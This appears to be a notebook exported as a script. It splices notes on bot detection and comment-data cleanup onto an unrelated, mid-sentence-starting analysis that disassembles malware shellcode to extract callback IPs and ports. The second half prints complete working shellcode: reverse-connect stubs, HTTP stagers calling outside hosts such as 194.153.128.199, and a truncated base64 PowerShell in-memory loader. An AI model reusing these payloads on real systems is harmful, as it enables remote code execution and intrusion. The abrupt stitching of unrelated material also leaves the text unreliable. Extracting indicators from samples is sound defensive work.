# • ONE PER ADDRESS/EMAIL – Considers only the first comment from each unique address and email combination
#
# Considering only Valid Addresses (Considers sample address data through August 4, 2017)
# • VALID ADDRESS – Considers only comments where an exact address match was found
# • ONE PER VALID ADDRESS - Considers only the first comment from each valid address
#
# To prepare the data for analysis, we performed various data cleanup/transformation activities, including the following:
# • Removal of special characters, tabs, new lines, leading spaces, and trailing spaces
# • Transformation of text fields to upper case
# • Standardization of state field to two character State Abbreviation
# • Standardization of ZIP code field to five digits, including padding of leading zeros
# • Extraction of country name from the “international address” field • Removal of duplicate comment (allowing only one per submission ID)
#
# #### DARPA Twitter bot challenge
# (BotOrNot competed in this challenge and came in top 3)
# https://arxiv.org/ftp/arxiv/papers/1601/1601.05140.pdf - Bot detection approaches
#
# #### Background:
# In 2015, DARPA (Defense advanced research projects agency) performed the twitter bot challenge, with the goal of identifying influence-bots that supported pro vaccination discussions on twitter. 6 teams(2 universities and some private companies) competed, with Sentimetrix winning.
#
# This is a description of the bot detection approaches used in the competition. It is intended to make for a definition of twitter bots, although it isn’t fully conclusive, as Bots were, and still are, hard to detect, despite research innovations within this field.
#
# A big part of the detection of bots, comes from machine learning, but the teams found that machine learning itself wasn’t sufficient.
# They also had to look at;
# #### Tweet syntax
# Does the user post tweets whose syntax is similar to the natural language generation program called Eliza and auto-generation of language.
# The average number of hashtags, user mentions, links, special characters, retweets, geo-enabled tweets, percentage of tweets ending with punctuation, hashtag or link
# #### Tweet semantics
# Number of user posts related to vaccination
# Users general opinion of the subject in question (in this case anti-vaccination). Are there any contradictions between opinions?
# The most frequent topics the user tweets about
# The number of languages used by the user - if there are several languages being used, the rationale is that it has a higher tendency of being a bot
# Inconsistency and URL replacements in retweets which directs users to sites that pays the “bot”-makers.
#
# #### Temporal behaviour features
# Did the user linger between opinions over time?
# Did the user engage users with anti-vaccination opinions, and then switching to a different view?
# Are there regularities in the tweets, meaning is the tweets tweeted with some specific algorithmic time schedule?
# The duration of tweeting - is the user tweeting constantly for 10 minutes, for an hour, etc.
# Average number of tweets per day
# Percentage of dropped followers
# Is there any abrupt changes in the users’ metadata? (followers, followees, posts).
#
# #### User profile features
# Did the user have a profile picture? From a stock site?
# Did the users profile have an associated URL? Was the URL meaningful, or just random numbers for example.
# How is the users twitter name? A standard string, or an integer?
# Number of posts/retweets/replies/mentions
# Number of followers/followings
# Number of sources used by the user such as mobile applications, desktop browsers, ‘null’ or anything else?
# GPS coordinate availability for user’s tweets
# Similarity of users to known bots
#
# #### Network features (We can make use of Gephi for doing this)
# Average deviation of user sentiment scores from those following and followees.
# In and out degree centrality
# Average clustering coefficient of retweet and mention network associated with each user
# Pagerank and betweenness centrality of users in both retweet and mention networks
# Variables related to star and clique networks associated with users.
# Number of known bots followed by a user - a user following several known bots is more likely to be a bot
# number/percentage of bots in the cluster that a user belonged to - if a clustering algorithm places the user in a cluster with many bots, he is more likely to be a bot.
#
# #### Socialbots and their friends (Robert W. Gehl & Maria Bakardjieva:
# The first definition that is presented in the book is what they call “a crisp technical definition”. It is made by engineers and it has its starting point in their research which was very innovative when it was done (page 1). It is as follows:
# “A socialbot is an automation software that controls an account on a particular OSN [Online Social Network], and has the ability to perform basic activities such as posting a message and sending a connection request. What makes a socialbot different from self-declared bots (e.g., Twitter bots that post up-to-date weather forecasts) and spambots is that it is designed to be stealthy, that is, it is able to pass itself off as a human being” (page 1).
# In this definition, the authors dissociate a socialbots from e.g. a Twitter bots, which is very relevant for our project. Its relevant in two different ways: at first, it outlines the big difference between socialbots and Twitter bots which is that socialbots are designed to be regarded as human beings. With this fact in mind the other relevant part is that the author of the definition wouldn’t regard Twitter bots that performs simple task as posting up-to-date weather forecast as a socialbot. Retweeting arguments related to a debate wouldn’t be considered more sophisticated than posting weather updates, or would it? For the Twitter bot to be part of a debate the owner of the bot must have some kind of part in the debate. If the owner wants the bot to partake in the debate and to send a certain message it requires some engineering of the bot so that it appears realistic.
#
# #### Characteristics of Social bots (definition 1):
# -designed to be stealthy (page 1)
#
# -designed to present a “self” (page 1)
#
# -designed to perform undesirable tasks (page 1)
#
# The second definition seems more concurrent in relation to our projects and experience. It is as follows:
#
# Socialbots are software processes that are programmed to appear to be human-generated within the context of social networking sites (SNSs) such as Facebook and Twitter. They achieve their ‘humanness’ by either mimicking other SNS users or through artificial intelligence that simulates human users of social networking sites. They share pictures, post status updates and Tweets, enter into conversations with other SNS users, and make and accept friend and follower requests. Importantly, they are designed to appear human to both SNS users as well as the SNS platform itself. Their goals are various, but often include shaping the online interactions and social networking practices of users (page 2).
# This definition differs from the first one in several ways. Taking in account the first line it is clear that this definition highlights the human aspect of these bots. They appear to be human-generated within a certain context.
#
# The definition explains the methodical way of making the bots intervene in social networks in ways that make their appearance trustworthy. It is explained how it is done: “… by either mimicking other SNS users or through artificial intelligence that simulates human users of social networking sites. They share pictures, post status updates and Tweets, enter into conversations with other SNS users, and make and accept friend and follower requests”.
#
# The most important attribute to the “modern” Socialbots are their complex goals. In our case it is as mentioned in the definition: “…but often include shaping the online interactions and social networking practices of users”. The clear purpose of the bots is what is both really interesting but also complicated. This may not always appear transparent.
#
# #### Characteristics of Social bots (definition 2):
# -designed to be human-generated within the context of SNS (page 2)
#
# -designed to mimic other users of SNS to achieve “humanness” (page 2)
#
# -designed to intervene in social networking practices (page 2)
#
# ### Literature research
#
# We looked through the literature from the lecture to provide us with an overview of which literature could be interesting to work with. We came to the conclusion that Marres, Latour, Venturini, Bacchi, Suchman, Clarke and Graham are interesting to look at.
below uses the `connect` IP to call back for c2 commands. Let's look at how to extract IPs and ports from shellcode.
## modified from c0a25828c491c50c94c95438a9240aec6c082069211909dc4d3e9c95fb054519
# Disassemble a short connect-back stub (pushes IP and port, then calls
# ws2_32!connect -- decoded in the markdown that follows).
output = disassemble_shellcode('0x68,0xc0,0xa8,0x83,0x82,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5')
output
# #### Extracting IP and Port numbers from shellcode
#
# Shellcode can call the winsock `connect` API to connect to a specified IP and port. Getting network indicators such as these
# can be valuable for defenders. The `connect` API is defined as follows (https://docs.microsoft.com/en-us/windows/desktop/api/winsock2/nf-winsock2-connect)
#
# ```
# int WSAAPI connect(
# SOCKET s,
# const sockaddr *name,
# int namelen
# );
# ```
# and takes the following structure. We can see it includes the port and IP address.
# ```
# struct sockaddr_in {
# short sin_family;
# u_short sin_port;
# struct in_addr sin_addr;
# char sin_zero[8];
# };
# ```
#
# The first two `PUSH` instructions in the sequence below set up the call to `connect` and contain the desired info:
# ```
# 0x00000000 68c0a88382 push 0x8283a8c0
# 0x00000005 680200115c push 0x5c110002--> IP 192.168.131.130:4444
# 0x0000000a 89e6 mov esi,esp
# 0x0000000c 6a10 push 16
# 0x0000000e 56 push esi
# 0x0000000f 57 push edi
# 0x00000010 6899a57461 push 0x6174a599
# 0x00000015 ffd5 call ebp --> ws2_32.dll!connect
# ```
#
# `0x8283a8c0` is the IP in DWORD form. Decode it as follows:
#
# ```
# hexIp = '0x8283a8c0'
# ip = f"{int(hexIp[8:10],16)}.{int(hexIp[6:8],16)}.{int(hexIp[4:6],16)}.{int(hexIp[2:4],16)}"
# ```
#
# `0x5c110002` contains the port in the high WORD. Decode it as follows:
# ```
# hexPort = '0x5c110002'
# port = int(hexPort[4:6]+ hexPort[2:4], 16)
# ```
# +
def shellcode_port(hex_dword):
    """Decode the sin_port WORD from a DWORD pushed for winsock connect().

    The port sits big-endian in the high WORD of the pushed value, so the
    two byte-pairs are swapped back before conversion.
    """
    return int(hex_dword[4:6] + hex_dword[2:4], 16)


def shellcode_ip(hex_dword):
    """Decode the sin_addr DWORD pushed for winsock connect() into dotted-quad form."""
    # Octets are stored reversed in the hex string; walk them back-to-front.
    octets = [int(hex_dword[k:k + 2], 16) for k in (8, 6, 4, 2)]
    return '.'.join(str(o) for o in octets)


# Generalized from the original hard-coded slicing so the same helpers can be
# reused on the other shellcode samples below.
hexPort = '0x5c110002'
port = shellcode_port(hexPort)
hexIp = '0x8283a8c0'
ip = shellcode_ip(hexIp)
print(f"The IP:port is {ip}:{port}")
# -
# ## Example 2
## from sample b047458659666aae6f4c4fb83e1987ecafcc561218a91f37ba5dceef25b7564c
sh2 = "0xdb,0xcb,0xd9,0x74,0x24,0xf4,0x5a,0x29,0xc9,0xb8,0x59,0x8f,0x04,0xdf,0xb1,0x47,0x31,0x42,0x1a,0x03,0x42,0x1a,0x83,0xea,0xfc,0xe2,0xac,0x73,0xec,0x5d,0x4e,0x8c,0xed,0x01,0xc7,0x69,0xdc,0x01,0xb3,0xfa,0x4f,0xb2,0xb0,0xaf,0x63,0x39,0x94,0x5b,0xf7,0x4f,0x30,0x6b,0xb0,0xfa,0x66,0x42,0x41,0x56,0x5a,0xc5,0xc1,0xa5,0x8e,0x25,0xfb,0x65,0xc3,0x24,0x3c,0x9b,0x29,0x74,0x95,0xd7,0x9f,0x69,0x92,0xa2,0x23,0x01,0xe8,0x23,0x23,0xf6,0xb9,0x42,0x02,0xa9,0xb2,0x1c,0x84,0x4b,0x16,0x15,0x8d,0x53,0x7b,0x10,0x44,0xef,0x4f,0xee,0x57,0x39,0x9e,0x0f,0xfb,0x04,0x2e,0xe2,0x02,0x40,0x89,0x1d,0x71,0xb8,0xe9,0xa0,0x81,0x7f,0x93,0x7e,0x04,0x64,0x33,0xf4,0xbe,0x40,0xc5,0xd9,0x58,0x02,0xc9,0x96,0x2f,0x4c,0xce,0x29,0xfc,0xe6,0xea,0xa2,0x03,0x29,0x7b,0xf0,0x27,0xed,0x27,0xa2,0x46,0xb4,0x8d,0x05,0x77,0xa6,0x6d,0xf9,0xdd,0xac,0x80,0xee,0x6c,0xef,0xcc,0xc3,0x5c,0x10,0x0d,0x4c,0xd7,0x63,0x3f,0xd3,0x43,0xec,0x73,0x9c,0x4d,0xeb,0x02,0x8a,0x6e,0x23,0xac,0xdb,0x91,0xc4,0xcd,0xf2,0x55,0x90,0x9d,0x6c,0x7c,0x99,0x75,0x6d,0x81,0x4c,0xe3,0x67,0x15,0xaf,0x5c,0x3f,0x65,0x47,0x9f,0xc0,0x64,0x24,0x16,0x26,0x36,0x04,0x79,0xf7,0xf6,0xf4,0x39,0xa7,0x9e,0x1e,0xb6,0x98,0xbe,0x20,0x1c,0xb1,0x54,0xcf,0xc9,0xe9,0xc0,0x76,0x50,0x61,0x71,0x76,0x4e,0x0f,0xb1,0xfc,0x7d,0xef,0x7f,0xf5,0x08,0xe3,0x17,0xf5,0x46,0x59,0xb1,0x0a,0x7d,0xf4,0x3d,0x9f,0x7a,0x5f,0x6a,0x37,0x81,0x86,0x5c,0x98,0x7a,0xed,0xd7,0x11,0xef,0x4e,0x8f,0x5d,0xff,0x4e,0x4f,0x08,0x95,0x4e,0x27,0xec,0xcd,0x1c,0x52,0xf3,0xdb,0x30,0xcf,0x66,0xe4,0x60,0xbc,0x21,0x8c,0x8e,0x9b,0x06,0x13,0x70,0xce,0x96,0x6f,0xa7,0x36,0xed,0x81,0x7b"
output = disassemble_shellcode (sh2)
output
extract_annotations_from_output(output)
# ## Example 3
# +
## from sample 57d736142db616f180a3b67adf5506ccd233320d98161eca4f7f1a97b031ce60
sh3='%fc,%e8,%82,%00,%00,%00,%60,%89,%e5,%31,%c0,%64,%8b,%50,%30,%8b,%52,%0c,%8b,%52,%14,%8b,%72,%28,%0f,%b7,%4a,%26,%31,%ff,%ac,%3c,%61,%7c,%02,%2c,%20,%c1,%cf,%0d,%01,%c7,%e2,%f2,%52,%57,%8b,%52,%10,%8b,%4a,%3c,%8b,%4c,%11,%78,%e3,%48,%01,%d1,%51,%8b,%59,%20,%01,%d3,%8b,%49,%18,%e3,%3a,%49,%8b,%34,%8b,%01,%d6,%31,%ff,%ac,%c1,%cf,%0d,%01,%c7,%38,%e0,%75,%f6,%03,%7d,%f8,%3b,%7d,%24,%75,%e4,%58,%8b,%58,%24,%01,%d3,%66,%8b,%0c,%4b,%8b,%58,%1c,%01,%d3,%8b,%04,%8b,%01,%d0,%89,%44,%24,%24,%5b,%5b,%61,%59,%5a,%51,%ff,%e0,%5f,%5f,%5a,%8b,%12,%eb,%8d,%5d,%68,%33,%32,%00,%00,%68,%77,%73,%32,%5f,%54,%68,%4c,%77,%26,%07,%89,%e8,%ff,%d0,%b8,%90,%01,%00,%00,%29,%c4,%54,%50,%68,%29,%80,%6b,%00,%ff,%d5,%6a,%0a,%68,%c0,%a8,%2b,%54,%68,%02,%00,%02,%9a,%89,%e6,%50,%50,%50,%50,%40,%50,%40,%50,%68,%ea,%0f,%df,%e0,%ff,%d5,%97,%6a,%10,%56,%57,%68,%99,%a5,%74,%61,%ff,%d5,%85,%c0,%74,%0c,%ff,%4e,%08,%75,%ec,%68,%f0,%b5,%a2,%56,%ff,%d5,%6a,%00,%6a,%04,%56,%57,%68,%02,%d9,%c8,%5f,%ff,%d5,%8b,%36,%6a,%40,%68,%00,%10,%00,%00,%56,%6a,%00,%68,%58,%a4,%53,%e5,%ff,%d5,%93,%53,%6a,%00,%56,%53,%57,%68,%02,%d9,%c8,%5f,%ff,%d5,%01,%c3,%29,%c6,%75,%ee,%c3'.replace('%','0x')
output = disassemble_shellcode (sh3)
output
# -
extract_strings(sh3)
extract_annotations_from_output(output)
# ## Example 4
#from sample 51f15304ebdb1fe876e26257bcb3a1a3060c64f681bade52723b396d8abcdd0b
sh4 = '0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x5c,0x11,0x00,0x00,0xe8,0x98,0x00,0x00,0x00,0x2f,0x31,0x5a,0x34,0x69,0x34,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xcd,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x69,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x35,0x2e,0x31,0x33,0x30,0x00'
output = disassemble_shellcode (sh4)
output
extract_strings(sh4)
extract_annotations_from_output(output)
# ## Example 5
sh5 = '0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x9b,0xad,0x00,0x00,0xe8,0x9c,0x00,0x00,0x00,0x2f,0x6d,0x63,0x67,0x73,0x47,0x53,0x66,0x4c,0x34,0x6a,0x49,0x47,0x38,0x51,0x66,0x77,0x57,0x70,0x64,0x6e,0x74,0x77,0x76,0x31,0x4d,0x6d,0x52,0x44,0x57,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x02,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x34,0x2e,0x31,0x35,0x33,0x2e,0x31,0x32,0x38,0x2e,0x31,0x39,0x39,0x00'
output = disassemble_shellcode (sh5)
output
extract_annotations_from_output(output)
# ## Example 6
sh6 = search_for_hex_shellcode(search_for_b64_string('JABGAFQAQQB0ACAAPQAgACcAJABUAEgAUABKACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQASABQAEoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAYQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBlACwAMAB4ADcAZgAsADAAeABhADAALAAwAHgAYQAxACwAMAB4ADcAMgAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAA4AGEALAAwAHgANQBjACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANwA0ACwAMAB4ADkAZAAsADAAeAA4AGEALAAwAHgAOQ
A1ACwAMAB4AGYAZAAsADAAeAA3ADgALAAwAHgAYgBiACwAMAB4ADkANQAsADAAeAA5ADkALAAwAHgAMAA5ACwAMAB4AGUAYwAsADAAeAAyADUALAAwAHgAZQBhACwAMAB4ADUAYwAsADAAeAAwADEALAAwAHgAYwBkACwAMAB4AGIAZQAsADAAeAA3ADQALAAwAHgAOQAyACwAMAB4AGEAMwAsADAAeAAxADYALAAwAHgANwBhACwAMAB4ADEAMwAsADAAeAAwADkALAAwAHgANAAwACwAMAB4AGIANQAsADAAeABhADQALAAwAHgAMgAyACwAMAB4AGIAMAAsADAAeABkADQALAAwAHgAMgA2ACwAMAB4ADMAOQAsADAAeABlADQALAAwAHgAMwA2ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgAZgA5ACwAMAB4ADMANwAsADAAeAA1AGYALAAwAHgAZQBmACwAMAB4AGYAMwAsADAAeAA2AGEALAAwAHgAMAA4ACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOQBhACwAMAB4ADMAZAAsADAAeAAzADEALAAwAHgANwA5ACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgAZAA3ACwAMAB4AGYAOQAsADAAeABjADUALAAwAHgAYwA2ACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgANQA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZQBhACwAMAB4ADUAYQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAMwAsADAAeAA0ADQALAAwAHgAZAA2ACwAMAB4ADgANAAsADAAeAA3AGEALAAwAHgAZgBlACwAMAB4ADIAYwAsADAAeAA3ADIALAAwAHgANwBkACwAMAB4AGQANgAsADAAeAA3AGMALAAwAHgANwBiACwAMAB4AGQAMQAsADAAeAAxADcALAAwAHgAYgAxACwAMAB4ADgAZQAsADAAeAAyADgALAAwAHgANQBmACwAMAB4ADcANgAsADAAeAA3ADEALAAwAHgANQBmACwAMAB4AGEAOQAsADAAeAA4ADQALAAwAHgAMABjACwAMAB4ADYANwAsADAAeAA2AGUALAAwAHgAZgA2ACwAMAB4AGMAYQAsADAAeABlADIALAAwAHgANwA1ACwAMAB4ADUAMAAsADAAeAA5ADgALAAwAHgANQA0ACwAMAB4ADUAMgAsADAAeAA2ADAALAAwAHgANABkACwAMAB4ADAAMgAsADAAeAAxADEALAAwAHgANgBlACwAMAB4ADMAYQAsADAAeAA0ADEALAAwAHgANwBkACwAMAB4ADcAMwAsADAAeABiAGQALAAwAHgAOAA2ACwAMAB4AGYANQAsADAAeAA4AGYALAAwAHgAMwA2ACwAMAB4ADIAOQAsADAAeABkAGEALAAwAHgAMQA5ACwAMAB4ADAAYwAsADAAeAAwAGQALAAwAHgAZgBlACwAMAB4ADQAMgAsADAAeABkADYALAAwAHgAMgBjACwAMAB4AGEANwAsADAAeAAyAGUALAAwAHgAYgA5ACwAMAB4ADUAMQAsADAAeABiADcALAAwAHgAOQAwACwAMAB4ADYANgAsADAAeABmADcALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAA3ADIALAAwAHgAOABhACwAMAB4ADkAOQAsADAAeAAyADkALAAwAHgAYgA3ACwAMAB4AGEANgAsADAAeAAyADEALAAwAHgAYQBhACwAMAB4AGQAZgAsADAAeABiADEALAAwAHgANQAyACwAMAB4ADkAOAAsADAAeAA0ADAALAAwAHgANgA5ACwAMAB4AGYAZAAsADAAeAA5ADAALAAwAHgAMAA5ACwAMAB4AGIANwAsADAAeABmAGEALAAwAHgAYQAxACwAMAB4ADEAZQAsADAAeAA0ADgALAAwAHgAZA
A0ACwAMAB4ADAAYQAsADAAeAA0AGUALAAwAHgAYgA3ACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAA2ACwAMAB4ADcAMwAsADAAeAA4ADEALAAwAHgAMwBhACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgAYQBhACwAMAB4AGQAMAAsADAAeAAwADAALAAwAHgANQBiACwAMAB4ADcAZgAsADAAeAA0AGMALAAwAHgAMABiACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAOQAxACwAMAB4ADAAOQAsADAAeAAwADQALAAwAHgAZQAzACwAMAB4ADkAMwAsADAAeAAwAGQALAAwAHgAMABiACwAMAB4AGEAZgAsADAAeAAxAGEALAAwAHgAZQBiACwAMAB4ADcAYgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGEANAAsADAAeAAzAGIALAAwAHgAYwBmACwAMAB4ADIAZAAsADAAeAAxADQALAAwAHgAZAAzACwAMAB4ADAANQAsADAAeABhADIALAAwAHgANABiACwAMAB4AGMAMwAsADAAeAAyADUALAAwAHgANgA4ACwAMAB4AGUANAAsADAAeAA2ADkALAAwAHgAYwBhACwAMAB4AGMANQAsADAAeAA1AGMALAAwAHgAMAA1ACwAMAB4ADcAMwAsADAAeAA0AGMALAAwAHgAMQA2ACwAMAB4AGIANAAsADAAeAA3AGMALAAwAHgANQBhACwAMAB4ADUAMgAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADYAOQAsADAAeABhADIALAAwAHgAYgA4ACwAMAB4AGYAZgAsADAAeAAwADQALAAwAHgAYgAwACwAMAB4ADIAYwAsADAAeABmADAALAAwAHgANQAyACwAMAB4AGUAYQAsADAAeABmAGEALAAwAHgAMABmACwAMAB4ADQAOQAsADAAeAA4ADEALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeAA3ADYALAAwAHgAMAAwACwAMAB4ADUANQAsADAAeAAzADIALAAwAHgANwA1ACwAMAB4ADcANQAsADAAeAA5ADEALAAwAHgAOQBkACwAMAB4ADgANgAsADAAeAA1ADAALAAwAHgAYQBhACwAMAB4ADEANAAsADAAeAAxADMALAAwAHgAMQBiACwAMAB4AGMANAAsADAAeAA1ADgALAAwAHgAZgAzACwAMAB4ADkAYgAsADAAeAAxADQALAAwAHgAMABmACwAMAB4ADkAOQAsADAAeAA5AGIALAAwAHgANwBjACwAMAB4AGYANwAsADAAeABmADkALAAwAHgAYwBmACwAMAB4ADkAOQAsADAAeABmADgALAAwAHgAZAA3ACwAMAB4ADYAMwAsADAAeAAzADIALAAwAHgANgBkACwAMAB4AGQAOAAsADAAeABkADUALAAwAH